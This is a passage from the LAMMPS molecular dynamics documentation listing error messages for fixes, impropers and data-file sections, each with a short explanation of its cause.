<DD>Self-explanatory.
<DT><I>Fix ID for fix store/state does not exist</I>
<DD>Self-explanatory
<DT><I>Fix ID must be alphanumeric or underscore characters</I>
<DD>Self-explanatory.
<DT><I>Fix SRD cannot have both atom attributes angmom and omega</I>
<DD>Use either spheroid solute particles or fully generalized
aspherical solute particles.
<DT><I>Fix SRD no-slip requires atom attribute torque</I>
<DD>This is because the SRD collisions will impart torque to the solute
particles.
<DT><I>Fix SRD requires atom attribute angmom or omega</I>
<DD>This is because the SRD collisions with cause the solute particles to
rotate.
<DT><I>Fix SRD requires atom attribute radius or shape</I>
<DD>This is because the solute particles must be finite-size particles,
not point particles.
<DT><I>Fix SRD: bad bin assignment for SRD advection</I>
<DD>Something has gone wrong in your SRD model; try using more
conservative settings.
<DT><I>Fix SRD: bad search bin assignment</I>
<DD>Something has gone wrong in your SRD model; try using more
conservative settings.
<DT><I>Fix SRD: bad stencil bin for big particle</I>
<DD>Something has gone wrong in your SRD model; try using more
conservative settings.
<DT><I>Fix SRD: too many big particles in bin</I>
<DD>Reset the ATOMPERBIN parameter at the top of fix_srd.cpp
to a larger value, and re-compile the code.
<DT><I>Fix adapt atom attribute is not recognized</I>
<DD>Self-explanatory
<DT><I>Fix adapt pair parameter is not recognized</I>
<DD>Self-explanatory
<DT><I>Fix adapt pair style does not exist</I>
<DD>Self-explanatory
<DT><I>Fix adapt pair types are not valid</I>
<DD>The specified types must be between 1 and Ntypes and be
used by the pair style.
<DT><I>Fix adapt requires atom attribute diameter</I>
<DD>The atom style being used does not specify an atom diameter.
<DT><I>Fix ave/atom compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/atom compute does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/atom compute does not calculate a per-atom vector</I>
<DD>A compute used by fix ave/atom must generate per-atom values.
<DT><I>Fix ave/atom compute does not calculate per-atom values</I>
<DD>A compute used by fix ave/atom must generate per-atom values.
<DT><I>Fix ave/atom fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/atom fix does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/atom fix does not calculate a per-atom vector</I>
<DD>A fix used by fix ave/atom must generate per-atom values.
<DT><I>Fix ave/atom fix does not calculate per-atom values</I>
<DD>A fix used by fix ave/atom must generate per-atom values.
<DT><I>Fix ave/atom variable is not atom-style variable</I>
<DD>A variable used by fix ave/atom must generate per-atom values.
<DT><I>Fix ave/histo cannot input local values in scalar mode</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo cannot input per-atom values in scalar mode</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a global array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a global scalar</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a global vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a local array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a local vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate a per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate local values</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute does not calculate per-atom values</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo compute vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a global array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a global scalar</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a global vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a local array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a local vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate a per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate local values</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix does not calculate per-atom values</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo fix vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo input is invalid compute</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo input is invalid fix</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo input is invalid variable</I>
<DD>Self-explanatory.
<DT><I>Fix ave/histo inputs are not all global, peratom, or local</I>
<DD>All inputs in a single fix ave/histo command must be of the
same style.
<DT><I>Fix ave/spatial compute does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/spatial compute does not calculate a per-atom vector</I>
<DD>A compute used by fix ave/spatial must generate per-atom values.
<DT><I>Fix ave/spatial compute does not calculate per-atom values</I>
<DD>A compute used by fix ave/spatial must generate per-atom values.
<DT><I>Fix ave/spatial compute vector is accessed out-of-range</I>
<DD>The index for the vector is out of bounds.
<DT><I>Fix ave/spatial fix does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/spatial fix does not calculate a per-atom vector</I>
<DD>A fix used by fix ave/spatial must generate per-atom values.
<DT><I>Fix ave/spatial fix does not calculate per-atom values</I>
<DD>A fix used by fix ave/spatial must generate per-atom values.
<DT><I>Fix ave/spatial fix vector is accessed out-of-range</I>
<DD>The index for the vector is out of bounds.
<DT><I>Fix ave/spatial for triclinic boxes requires units reduced</I>
<DD>Self-explanatory.
<DT><I>Fix ave/spatial settings invalid with changing box</I>
<DD>If the ave setting is "running" or "window" and the box size/shape
changes during the simulation, then the units setting must be
"reduced", else the number of bins may change.
<DT><I>Fix ave/spatial variable is not atom-style variable</I>
<DD>A variable used by fix ave/spatial must generate per-atom values.
<DT><I>Fix ave/time cannot set output array intensive/extensive from these inputs</I>
<DD>One of more of the vector inputs has individual elements which are
flagged as intensive or extensive. Such an input cannot be flagged as
all intensive/extensive when turned into an array by fix ave/time.
<DT><I>Fix ave/time cannot use variable with vector mode</I>
<DD>Variables produce scalar values.
<DT><I>Fix ave/time columns are inconsistent lengths</I>
<DD>Self-explanatory.
<DT><I>Fix ave/time compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/time compute does not calculate a array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/time compute does not calculate a scalar</I>
<DD>Only computes that calculate a scalar or vector quantity (not a
per-atom quantity) can be used with fix ave/time.
<DT><I>Fix ave/time compute does not calculate a vector</I>
<DD>Only computes that calculate a scalar or vector quantity (not a
per-atom quantity) can be used with fix ave/time.
<DT><I>Fix ave/time compute vector is accessed out-of-range</I>
<DD>The index for the vector is out of bounds.
<DT><I>Fix ave/time fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix ave/time fix does not calculate a array</I>
<DD>Self-explanatory.
<DT><I>Fix ave/time fix does not calculate a scalar</I>
<DD>A fix used by fix ave/time must generate global values.
<DT><I>Fix ave/time fix does not calculate a vector</I>
<DD>A fix used by fix ave/time must generate global values.
<DT><I>Fix ave/time fix vector is accessed out-of-range</I>
<DD>The index for the vector is out of bounds.
<DT><I>Fix ave/time variable is not equal-style variable</I>
<DD>A variable used by fix ave/time must generate a global value.
<DT><I>Fix bond/break requires special_bonds = 0,1,1</I>
<DD>This is a restriction of the current fix bond/break implementation.
<DT><I>Fix bond/create cutoff is longer than pairwise cutoff</I>
<DD>This is not allowed because bond creation is done using the
pairwise neighbor list.
<DT><I>Fix bond/create requires special_bonds coul = 0,1,1</I>
<DD>Self-explanatory.
<DT><I>Fix bond/create requires special_bonds lj = 0,1,1</I>
<DD>Self-explanatory.
<DT><I>Fix bond/swap cannot use dihedral or improper styles</I>
<DD>These styles cannot be defined when using this fix.
<DT><I>Fix bond/swap requires pair and bond styles</I>
<DD>Self-explanatory.
<DT><I>Fix bond/swap requires special_bonds = 0,1,1</I>
<DD>Self-explanatory.
<DT><I>Fix box/relax generated negative box length</I>
<DD>The pressure being applied is likely too large. Try applying
it incrementally, to build to the high pressure.
<DT><I>Fix command before simulation box is defined</I>
<DD>The fix command cannot be used before a read_data, read_restart, or
create_box command.
<DT><I>Fix deform is changing yz by too much with changing xy</I>
<DD>When both yz and xy are changing, it induces changes in xz if the
box must flip from one tilt extreme to another. Thus it is not
allowed for yz to grow so much that a flip is induced.
<DT><I>Fix deform tilt factors require triclinic box</I>
<DD>Cannot deform the tilt factors of a simulation box unless it
is a triclinic (non-orthogonal) box.
<DT><I>Fix deform volume setting is invalid</I>
<DD>Cannot use volume style unless other dimensions are being controlled.
<DT><I>Fix deposit region cannot be dynamic</I>
<DD>Only static regions can be used with fix deposit.
<DT><I>Fix deposit region does not support a bounding box</I>
<DD>Not all regions represent bounded volumes. You cannot use
such a region with the fix deposit command.
<DT><I>Fix evaporate molecule requires atom attribute molecule</I>
<DD>The atom style being used does not define a molecule ID.
<DT><I>Fix external callback function not set</I>
<DD>This must be done by an external program in order to use this fix.
<DT><I>Fix for fix ave/atom not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix ave/atom is
requesting a value on a non-allowed timestep.
<DT><I>Fix for fix ave/correlate not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix ave/correlate
is requesting a value on a non-allowed timestep.
<DT><I>Fix for fix ave/histo not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix ave/histo is
requesting a value on a non-allowed timestep.
<DT><I>Fix for fix ave/spatial not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix ave/spatial is
requesting a value on a non-allowed timestep.
<DT><I>Fix for fix ave/time not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix ave/time
is requesting a value on a non-allowed timestep.
<DT><I>Fix for fix store/state not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Fix store/state
is requesting a value on a non-allowed timestep.
<DT><I>Fix freeze requires atom attribute torque</I>
<DD>The atom style defined does not have this attribute.
<DT><I>Fix heat group has no atoms</I>
<DD>Self-explanatory.
<DT><I>Fix heat kinetic energy went negative</I>
<DD>This will cause the velocity rescaling about to be performed by fix
heat to be invalid.
<DT><I>Fix in variable not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. The variable is
requesting the values on a non-allowed timestep.
<DT><I>Fix langevin period must be > 0.0</I>
<DD>The time window for temperature relaxation must be > 0
<DT><I>Fix momentum group has no atoms</I>
<DD>Self-explanatory.
<DT><I>Fix move cannot define z or vz variable for 2d problem</I>
<DD>Self-explanatory.
<DT><I>Fix move cannot have 0 length rotation vector</I>
<DD>Self-explanatory.
<DT><I>Fix move cannot rotate aroung non z-axis for 2d problem</I>
<DD>Self-explanatory.
<DT><I>Fix move cannot set linear z motion for 2d problem</I>
<DD>Self-explanatory.
<DT><I>Fix move cannot set wiggle z motion for 2d problem</I>
<DD>Self-explanatory.
<DT><I>Fix msst compute ID does not compute potential energy</I>
<DD>Self-explanatory.
<DT><I>Fix msst compute ID does not compute pressure</I>
<DD>Self-explanatory.
<DT><I>Fix msst compute ID does not compute temperature</I>
<DD>Self-explanatory.
<DT><I>Fix msst requires a periodic box</I>
<DD>Self-explanatory.
<DT><I>Fix msst tscale must satisfy 0 <= tscale < 1</I>
<DD>Self-explanatory.
<DT><I>Fix npt/nph has tilted box too far - box flips are not yet implemented</I>
<DD>This feature has not yet been added. However, if you are applying
an off-diagonal pressure to a fluid, the box may want to tilt indefinitely,
because the fluid cannot support the pressure you are imposing.
<DT><I>Fix nve/asphere cannot be used with atom attributes diameter or rmass</I>
<DD>These attributes override the shape and mass settings, so cannot be
used.
<DT><I>Fix nve/asphere requires atom attributes angmom, quat, torque, shape</I>
<DD>An atom style that specifies these quantities is needed.
<DT><I>Fix nve/asphere requires extended particles</I>
<DD>This fix can only be used for particles with a shape setting.
<DT><I>Fix nve/sphere requires atom attribute diameter or shape</I>
<DD>An atom style that specifies these quantities is needed.
<DT><I>Fix nve/sphere requires atom attribute mu</I>
<DD>An atom style with this attribute is needed.
<DT><I>Fix nve/sphere requires atom attributes omega, torque</I>
<DD>An atom style with these attributes is needed.
<DT><I>Fix nve/sphere requires extended particles</I>
<DD>This fix can only be used for particles of a finite size.
<DT><I>Fix nve/sphere requires spherical particle shapes</I>
<DD>Self-explanatory.
<DT><I>Fix nvt/nph/npt asphere cannot be used with atom attributes diameter or rmass</I>
<DD>Those attributes are for spherical particles.
<DT><I>Fix nvt/nph/npt asphere requires atom attributes quat, angmom, torque, shape</I>
<DD>Those attributes are what are used to define aspherical particles.
<DT><I>Fix nvt/nph/npt asphere requires extended particles</I>
<DD>The shape setting for a particle in the fix group has shape = 0.0,
which means it is a point particle.
<DT><I>Fix nvt/nph/npt sphere requires atom attribute diameter or shape</I>
<DD>An atom style that specifies these quantities is needed.
<DT><I>Fix nvt/nph/npt sphere requires atom attributes omega, torque</I>
<DD>Those attributes are what are used to define spherical particles.
<DT><I>Fix nvt/npt/nph damping parameters must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix nvt/sphere requires extended particles</I>
<DD>This fix can only be used for particles of a finite size.
<DT><I>Fix nvt/sphere requires spherical particle shapes</I>
<DD>Self-explanatory.
<DT><I>Fix orient/fcc file open failed</I>
<DD>The fix orient/fcc command could not open a specified file.
<DT><I>Fix orient/fcc file read failed</I>
<DD>The fix orient/fcc command could not read the needed parameters from a
specified file.
<DT><I>Fix orient/fcc found self twice</I>
<DD>The neighbor lists used by fix orient/fcc are messed up. If this
error occurs, it is likely a bug, so send an email to the
<A HREF = "http://lammps.sandia.gov/authors.html">developers</A>.
<DT><I>Fix peri neigh does not exist</I>
<DD>Somehow a fix that the pair style defines has been deleted.
<DT><I>Fix pour region ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix pour region cannot be dynamic</I>
<DD>Only static regions can be used with fix pour.
<DT><I>Fix pour region does not support a bounding box</I>
<DD>Not all regions represent bounded volumes. You cannot use
such a region with the fix pour command.
<DT><I>Fix pour requires atom attributes radius, rmass</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Fix press/berendsen damping parameters must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix qeq/comb group has no atoms</I>
<DD>Self-explanatory.
<DT><I>Fix qeq/comb requires atom attribute q</I>
<DD>An atom style with charge must be used to perform charge equilibration.
<DT><I>Fix reax/bonds numbonds > nsbmax_most</I>
<DD>The limit of the number of bonds expected by the ReaxFF force field
was exceeded.
<DT><I>Fix recenter group has no atoms</I>
<DD>Self-explanatory.
<DT><I>Fix rigid/nvt period must be > 0.0</I>
<DD>Self-explanatory
<DT><I>Fix rigid: Bad principal moments</I>
<DD>The principal moments of inertia computed for a rigid body
are not within the required tolerances.
<DT><I>Fix shake cannot be used with minimization</I>
<DD>Cannot use fix shake while doing an energy minimization since
it turns off bonds that should contribute to the energy.
<DT><I>Fix spring couple group ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix srd lamda must be >= 0.6 of SRD grid size</I>
<DD>This is a requirement for accuracy reasons.
<DT><I>Fix srd requires SRD particles all have same mass</I>
<DD>Self-explanatory.
<DT><I>Fix srd requires ghost atoms store velocity</I>
<DD>Use the communicate vel yes command to enable this.
<DT><I>Fix srd requires newton pair on</I>
<DD>Self-explanatory.
<DT><I>Fix srd simulation box must be periodic</I>
<DD>Self-explanatory.
<DT><I>Fix store/state compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix store/state compute does not calculate a per-atom array</I>
<DD>The compute calculates a per-atom vector.
<DT><I>Fix store/state compute does not calculate a per-atom vector</I>
<DD>The compute calculates a per-atom vector.
<DT><I>Fix store/state compute does not calculate per-atom values</I>
<DD>Computes that calculate global or local quantities cannot be used
with fix store/state.
<DT><I>Fix store/state fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Fix store/state fix does not calculate a per-atom array</I>
<DD>The fix calculates a per-atom vector.
<DT><I>Fix store/state fix does not calculate a per-atom vector</I>
<DD>The fix calculates a per-atom array.
<DT><I>Fix store/state fix does not calculate per-atom values</I>
<DD>Fixes that calculate global or local quantities cannot be used with
fix store/state.
<DT><I>Fix store/state for atom property that isn't allocated</I>
<DD>Self-explanatory.
<DT><I>Fix store/state variable is not atom-style variable</I>
<DD>Only atom-style variables calculate per-atom quantities.
<DT><I>Fix temp/berendsen period must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix thermal/conductivity swap value must be positive</I>
<DD>Self-explanatory.
<DT><I>Fix tmd must come after integration fixes</I>
<DD>Any fix tmd command must appear in the input script after all time
integration fixes (nve, nvt, npt). See the fix tmd documentation for
details.
<DT><I>Fix ttm electron temperatures must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm electronic_density must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm electronic_specific_heat must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm electronic_thermal_conductivity must be >= 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm gamma_p must be > 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm gamma_s must be >= 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm number of nodes must be > 0</I>
<DD>Self-explanatory.
<DT><I>Fix ttm v_0 must be >= 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix used in compute reduce not computed at compatible time</I>
<DD>Fixes generate their values on specific timesteps. Compute sum is
requesting a value on a non-allowed timestep.
<DT><I>Fix viscosity swap value must be positive</I>
<DD>Self-explanatory.
<DT><I>Fix viscosity vtarget value must be positive</I>
<DD>Self-explanatory.
<DT><I>Fix wall cutoff <= 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix wall/colloid cannot be used with atom attribute diameter</I>
<DD>Only finite-size particles defined by the shape command can be used.
<DT><I>Fix wall/colloid requires atom attribute shape</I>
<DD>Self-explanatory.
<DT><I>Fix wall/colloid requires extended particles</I>
<DD>Self-explanatory.
<DT><I>Fix wall/colloid requires spherical particles</I>
<DD>Self-explanatory.
<DT><I>Fix wall/gran is incompatible with Pair style</I>
<DD>Must use a granular pair style to define the parameters needed for
this fix.
<DT><I>Fix wall/gran requires atom attributes radius, omega, torque</I>
<DD>The atom style defined does not have these attributes.
<DT><I>Fix wall/region colloid cannot be used with atom attribute diameter</I>
<DD>Only finite-size particles defined by the shape command can be used.
<DT><I>Fix wall/region colloid requires atom attribute shape</I>
<DD>Self-explanatory.
<DT><I>Fix wall/region colloid requires extended particles</I>
<DD>Self-explanatory.
<DT><I>Fix wall/region colloid requires spherical particles</I>
<DD>Self-explanatory.
<DT><I>Fix wall/region cutoff <= 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix_modify order must be 3 or 5</I>
<DD>Self-explanatory.
<DT><I>Fix_modify pressure ID does not compute pressure</I>
<DD>The compute ID assigned to the fix must compute pressure.
<DT><I>Fix_modify temperature ID does not compute temperature</I>
<DD>The compute ID assigned to the fix must compute temperature.
<DT><I>Found no restart file matching pattern</I>
<DD>When using a "*" in the restart file name, no matching file was found.
<DT><I>Gravity changed since fix pour was created</I>
<DD>Gravity must be static and not dynamic for use with fix pour.
<DT><I>Gravity must point in -y to use with fix pour in 2d</I>
<DD>Gravity must be pointing "down" in a 2d box.
<DT><I>Gravity must point in -z to use with fix pour in 3d</I>
<DD>Gravity must be pointing "down" in a 3d box, i.e. theta = 180.0.
<DT><I>Group ID does not exist</I>
<DD>A group ID used in the group command does not exist.
<DT><I>Group ID in variable formula does not exist</I>
<DD>Self-explanatory.
<DT><I>Group command before simulation box is defined</I>
<DD>The group command cannot be used before a read_data, read_restart, or
create_box command.
<DT><I>Group region ID does not exist</I>
<DD>A region ID used in the group command does not exist.
<DT><I>Illegal ... command</I>
<DD>Self-explanatory. Check the input script syntax and compare to the
documentation for the command. You can use -echo screen as a
command-line option when running LAMMPS to see the offending line.
<DT><I>Illegal COMB parameter</I>
<DD>One or more of the coefficients defined in the potential file is
invalid.
<DT><I>Illegal Stillinger-Weber parameter</I>
<DD>One or more of the coefficients defined in the potential file is
invalid.
<DT><I>Illegal Tersoff parameter</I>
<DD>One or more of the coefficients defined in the potential file is
invalid.
<DT><I>Illegal chemical element names</I>
<DD>The name is too long to be a chemical element.
<DT><I>Illegal number of angle table entries</I>
<DD>There must be at least 2 table entries.
<DT><I>Illegal number of bond table entries</I>
<DD>There must be at least 2 table entries.
<DT><I>Illegal number of pair table entries</I>
<DD>There must be at least 2 table entries.
<DT><I>Illegal simulation box</I>
<DD>The lower bound of the simulation box is greater than the upper bound.
<DT><I>Improper atom missing in delete_bonds</I>
<DD>The delete_bonds command cannot find one or more atoms in a particular
improper on a particular processor. The pairwise cutoff is too short
or the atoms are too far apart to make a valid improper.
<DT><I>Improper atom missing in set command</I>
<DD>The set command cannot find one or more atoms in a particular improper
on a particular processor. The pairwise cutoff is too short or the
atoms are too far apart to make a valid improper.
<DT><I>Improper atoms %d %d %d %d missing on proc %d at step %d</I>
<DD>One or more of 4 atoms needed to compute a particular improper are
missing on this processor. Typically this is because the pairwise
cutoff is set too short or the improper has blown apart and an atom is
too far away.
<DT><I>Improper coeff for hybrid has invalid style</I>
<DD>Improper style hybrid uses another improper style as one of its
coefficients. The improper style used in the improper_coeff command
or read from a restart file is not recognized.
<DT><I>Improper coeffs are not set</I>
<DD>No improper coefficients have been assigned in the data file or via
the improper_coeff command.
<DT><I>Improper style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Improper style hybrid cannot have none as an argument</I>
<DD>Self-explanatory.
<DT><I>Improper style hybrid cannot use same improper style twice</I>
<DD>Self-explanatory.
<DT><I>Improper_coeff command before improper_style is defined</I>
<DD>Coefficients cannot be set in the data file or via the improper_coeff
command until an improper_style has been assigned.
<DT><I>Improper_coeff command before simulation box is defined</I>
<DD>The improper_coeff command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Improper_coeff command when no impropers allowed</I>
<DD>The chosen atom style does not allow for impropers to be defined.
<DT><I>Improper_style command when no impropers allowed</I>
<DD>The chosen atom style does not allow for impropers to be defined.
<DT><I>Impropers assigned incorrectly</I>
<DD>Impropers read in from the data file were not assigned correctly to
atoms. This means there is something invalid about the topology
definitions.
<DT><I>Impropers defined but no improper types</I>
<DD>The data file header lists improper but no improper types.
<DT><I>Inconsistent iparam/jparam values in fix bond/create command</I>
<DD>If itype and jtype are the same, then their maxbond and newtype
settings must also be the same.
<DT><I>Incorrect args for angle coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect args for bond coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect args for dihedral coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect args for improper coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect args for pair coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect args in pair_style command</I>
<DD>Self-explanatory.
<DT><I>Incorrect atom format in data file</I>
<DD>Number of values per atom line in the data file is not consistent with
the atom style.
<DT><I>Incorrect boundaries with slab Ewald</I>
<DD>Must have periodic x,y dimensions and non-periodic z dimension to use
2d slab option with Ewald.
<DT><I>Incorrect boundaries with slab PPPM</I>
<DD>Must have periodic x,y dimensions and non-periodic z dimension to use
2d slab option with PPPM.
<DT><I>Incorrect element names in EAM potential file</I>
<DD>The element names in the EAM file do not match those requested.
<DT><I>Incorrect format in COMB potential file</I>
<DD>Incorrect number of words per line in the potential file.
<DT><I>Incorrect format in MEAM potential file</I>
<DD>Incorrect number of words per line in the potential file.
<DT><I>Incorrect format in NEB coordinate file</I>
<DD>Self-explanatory.
<DT><I>Incorrect format in Stillinger-Weber potential file</I>
<DD>Incorrect number of words per line in the potential file.
<DT><I>Incorrect format in TMD target file</I>
<DD>Format of file read by fix tmd command is incorrect.
<DT><I>Incorrect format in Tersoff potential file</I>
<DD>Incorrect number of words per line in the potential file.
<DT><I>Incorrect multiplicity arg for dihedral coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect sign arg for dihedral coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Incorrect velocity format in data file</I>
<DD>Each atom style defines a format for the Velocity section
of the data file. The read-in lines do not match.
<DT><I>Incorrect weight arg for dihedral coefficients</I>
<DD>Self-explanatory. Check the input script or data file.
<DT><I>Index between variable brackets must be positive</I>
<DD>Self-explanatory.
<DT><I>Indexed per-atom vector in variable formula without atom map</I>
<DD>Accessing a value from an atom vector requires the ability to lookup
an atom index, which is provided by an atom map. An atom map does not
exist (by default) for non-molecular problems. Using the atom_modify
map command will force an atom map to be created.
<DT><I>Induced tilt by displace_box is too large</I>
<DD>The final tilt value must be between -1/2 and 1/2 of the perpendicular
box length.
<DT><I>Initial temperatures not all set in fix ttm</I>
<DD>Self-explantory.
<DT><I>Input line too long after variable substitution</I>
<DD>This is a hard (very large) limit defined in the input.cpp file.
<DT><I>Input line too long: %s</I>
<DD>This is a hard (very large) limit defined in the input.cpp file.
<DT><I>Insertion region extends outside simulation box</I>
<DD>Region specified with fix pour command extends outside the global
simulation box.
<DT><I>Insufficient Jacobi rotations for POEMS body</I>
<DD>Eigensolve for rigid body was not sufficiently accurate.
<DT><I>Insufficient Jacobi rotations for rigid body</I>
<DD>Eigensolve for rigid body was not sufficiently accurate.
<DT><I>Invalid REAX atom type</I>
<DD>There is a mis-match between LAMMPS atom types and the elements
listed in the ReaxFF force field file.
<DT><I>Invalid angle style</I>
<DD>The choice of angle style is unknown.
<DT><I>Invalid angle table length</I>
<DD>Length must be 2 or greater.
<DT><I>Invalid angle type in Angles section of data file</I>
<DD>Angle type must be positive integer and within range of specified angle
types.
<DT><I>Invalid angle type index for fix shake</I>
<DD>Self-explanatory.
<DT><I>Invalid atom ID in Angles section of data file</I>
<DD>Atom IDs must be positive integers and within range of defined
atoms.
<DT><I>Invalid atom ID in Atoms section of data file</I>
<DD>Atom IDs must be positive integers.
<DT><I>Invalid atom ID in Bonds section of data file</I>
<DD>Atom IDs must be positive integers and within range of defined
atoms.
<DT><I>Invalid atom ID in Dihedrals section of data file</I>
<DD>Atom IDs must be positive integers and within range of defined
atoms.
<DT><I>Invalid atom ID in Impropers section of data file</I>
<DD>Atom IDs must be positive integers and within range of defined
atoms.
<DT><I>Invalid atom ID in Velocities section of data file</I>
<DD>Atom IDs must be positive integers and within range of defined
atoms.
<DT><I>Invalid atom mass for fix shake</I>
<DD>Mass specified in fix shake command must be > 0.0.
<DT><I>Invalid atom style</I>
<DD>The choice of atom style is unknown.
<DT><I>Invalid atom type in Atoms section of data file</I>
<DD>Atom types must range from 1 to specified # of types.
<DT><I>Invalid atom type in create_atoms command</I>
<DD>The create_box command specified the range of valid atom types.
An invalid type is being requested.
<DT><I>Invalid atom type in fix bond/create command</I>
<DD>Self-explanatory.
<DT><I>Invalid atom type in neighbor exclusion list</I>
<DD>Atom types must range from 1 to Ntypes inclusive.
<DT><I>Invalid atom type index for fix shake</I>
<DD>Atom types must range from 1 to Ntypes inclusive.
<DT><I>Invalid atom types in pair_write command</I>
<DD>Atom types must range from 1 to Ntypes inclusive.
<DT><I>Invalid atom vector in variable formula</I>
<DD>The atom vector is not recognized.
<DT><I>Invalid attribute in dump custom command</I>
<DD>Self-explantory.
<DT><I>Invalid attribute in dump local command</I>
<DD>Self-explantory.
<DT><I>Invalid attribute in dump modify command</I>
<DD>Self-explantory.
<DT><I>Invalid bond style</I>
<DD>The choice of bond style is unknown.
<DT><I>Invalid bond table length</I>
<DD>Length must be 2 or greater.
<DT><I>Invalid bond type in Bonds section of data file</I>
<DD>Bond type must be positive integer and within range of specified bond
types.
<DT><I>Invalid bond type in fix bond/break command</I>
<DD>Self-explanatory.
<DT><I>Invalid bond type in fix bond/create command</I>
<DD>Self-explanatory.
<DT><I>Invalid bond type index for fix shake</I>
<DD>Self-explanatory. Check the fix shake command in the input script.
<DT><I>Invalid coeffs for this angle style</I>
<DD>Cannot set class 2 coeffs in data file for this angle style.
<DT><I>Invalid coeffs for this dihedral style</I>
<DD>Cannot set class 2 coeffs in data file for this dihedral style.
<DT><I>Invalid coeffs for this improper style</I>
<DD>Cannot set class 2 coeffs in data file for this improper style.
<DT><I>Invalid command-line argument</I>
<DD>One or more command-line arguments is invalid. Check the syntax of
the command you are using to launch LAMMPS.
<DT><I>Invalid compute ID in variable formula</I>
<DD>The compute is not recognized.
<DT><I>Invalid compute style</I>
<DD>Self-explanatory.
<DT><I>Invalid cutoff in communicate command</I>
<DD>Specified cutoff must be >= 0.0.
<DT><I>Invalid cutoffs in pair_write command</I>
<DD>Inner cutoff must be larger than 0.0 and less than outer cutoff.
<DT><I>Invalid d1 or d2 value for pair colloid coeff</I>
<DD>Neither d1 or d2 can be < 0.
<DT><I>Invalid data file section: Angle Coeffs</I>
<DD>Atom style does not allow angles.
<DT><I>Invalid data file section: AngleAngle Coeffs</I>
<DD>Atom style does not allow impropers.
<DT><I>Invalid data file section: AngleAngleTorsion Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: AngleTorsion Coeffs</I>
<DD>Atom style does not allow dihedrals.
<DT><I>Invalid data file section: Angles</I>
<DD>Atom style does not allow angles.
<DT><I>Invalid data file section: Bond Coeffs</I>
<DD>Atom style does not allow bonds.
<DT><I>Invalid data file section: BondAngle Coeffs</I>
<DD>Atom style does not allow angles.
<DT><I>Invalid data file section: BondBond Coeffs</I>
